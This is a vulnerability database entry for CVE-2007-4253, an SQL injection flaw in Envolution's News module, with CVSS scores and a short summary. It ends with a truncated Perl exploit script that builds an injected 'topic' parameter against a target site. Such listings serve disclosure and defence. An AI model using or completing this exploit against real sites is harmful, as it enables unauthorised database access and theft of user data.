7.5
CVSSv2

CVE-2007-4253

Published: 08/08/2007 Updated: 15/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the News module in modules.php in Envolution 1.1.0 and previous versions allows remote malicious users to execute arbitrary SQL commands via the topic parameter, a different vector than CVE-2005-4263.

Vulnerable Product Search on Vulmon Subscribe to Product

envolution envolution

Exploits

#!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; if(@ARGV < 3) { usage(); exit(); } $site = $ARGV[0]; # Site Target $path = $ARGV[1]; # Path direktori envolution_1-0-1 $usid = $ARGV[2]; # member id $www = new LWP::UserAgent; $sql = "$site/$path/modulesphp?op=modload&name=News&file=index&catid=&topic=2%20and%201 ...